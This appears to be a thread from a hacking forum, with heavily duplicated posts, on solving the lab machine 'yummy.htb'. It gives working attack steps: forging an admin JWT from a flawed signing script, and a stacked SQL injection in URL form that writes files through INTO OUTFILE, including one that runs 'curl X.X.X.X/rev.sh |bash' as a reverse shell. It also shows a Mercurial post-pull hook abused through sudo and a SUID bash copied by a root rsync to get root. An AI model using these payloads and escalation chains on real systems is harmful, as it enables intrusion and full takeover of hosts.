[Detector6]

How did you guys found the admindashboard, and from where did you get the script to get admin jwt toke. can you please explain it to me

the script is modified from the source code backupapp.zip.

crontab -> scripts -> backupapp.zip -> signature.py script that is not normal -> custom flaw with public private key -> create your own public private key pair script.

optional task do math degree

[jsvensson]

For those who wonder how foothold works:
it results from /data/scripts/dbmonitor.sh
among other things, this script checks if the dbstatus.json file exists
if it exists and does not contain “database is down” executes:            /bin/bash “$latest_version” where: latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
so it will execute /bin/bash /data/scripts/fixer-v____ if you write such a file there and write anything other than “database is down” to /data/scripts/dbstatus.json

[Unbutton8074]

For those who wonder how foothold works:
it results from /data/scripts/dbmonitor.sh
among other things, this script checks if the dbstatus.json file exists
if it exists and does not contain “database is down” executes:            /bin/bash “$latest_version” where: latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
so it will execute /bin/bash /data/scripts/fixer-v____ if you write such a file there and write anything other than “database is down” to /data/scripts/dbstatus.json

thats why you have to replace dbstatus.json first to get foothold work

[ir0nman4l1f3]

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

I'm assuming there is a cleanup script running on the machine because I kept getting an error earlier while trying this method and eventually gave up. Reading your process made me feel less crazy but still had issues getting it to execute even with your steps

I eventually resolved this by chaining everything together with "&&" between each command. Leaving this comment in case anyone else is having issues similar.

[dogedofedoge]

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

I'm assuming there is a cleanup script running on the machine because I kept getting an error earlier while trying this method and eventually gave up. Reading your process made me feel less crazy but still had issues getting it to execute even with your steps

I eventually resolved this by chaining everything together with "&&" between each command. Leaving this comment in case anyone else is having issues similar.

I was stuck with the errors from DEV to ROOT, using your method it worked in first try

cd /home/dev/ && cp /bin/bash app-production/bash && chmod u+s app-production/bash && sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/ && /opt/app/bash -p

[ir0nman4l1f3]

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

I'm assuming there is a cleanup script running on the machine because I kept getting an error earlier while trying this method and eventually gave up. Reading your process made me feel less crazy but still had issues getting it to execute even with your steps

I eventually resolved this by chaining everything together with "&&" between each command. Leaving this comment in case anyone else is having issues similar.

I was stuck with the errors from DEV to ROOT, using your method it worked in first try

cd /home/dev/ && cp /bin/bash app-production/bash && chmod u+s app-production/bash && sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/ && /opt/app/bash -p

Nice! All the praise goes to @hackemall though since they helped steer me in right direction after all

[mbaker5159]

would like to learn more about this set of commands, any reference link?

ooops... these commands


http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

[Rob1nhood]

would like to learn more about this set of commands, any reference link?

ooops... these commands


http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

using SQLi we can see that the O field is vulnerable.
This is where we craft our injection.
After enumerating DB we can see we have FILE permission. meaning we can read/write files.

Knowing how DBmonitor works. We then craft the SQL injection to write "PING" into the file dbstatus.json, 
Since its not "database is down" this triggers the line in dbmonitor to run fixer-v* which is all fixer-v files.
The second injection then writes our curl command to grab and execute our reverse shell, as a fixer-v script. 
So long as you do them in succesion via automation, or something like repeater in burpsuite etc. so they run one after another, it will trigger the fixer-v____ file you created, and dbmonitor.sh will run it.
so when done correctly it curls you and grabs your reverse shell file your hosting. and executes it as the sql user.

[mrdot457]

How did you guys found the admindashboard, and from where did you get the script to get admin jwt toke. can you please explain it to me

the script is modified from the source code backupapp.zip.

crontab -> scripts -> backupapp.zip -> signature.py script that is not normal -> custom flaw with public private key -> create your own public private key pair script.

optional task do math degree

How to get these files, i meant the backp.zip

i tried lfoi and other things, but i dont know how to get this.,

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[anonymousdoomer]

Was able to grab backupapp.zip after reading the app_backup SCript found in crontab

how can i grab this file ?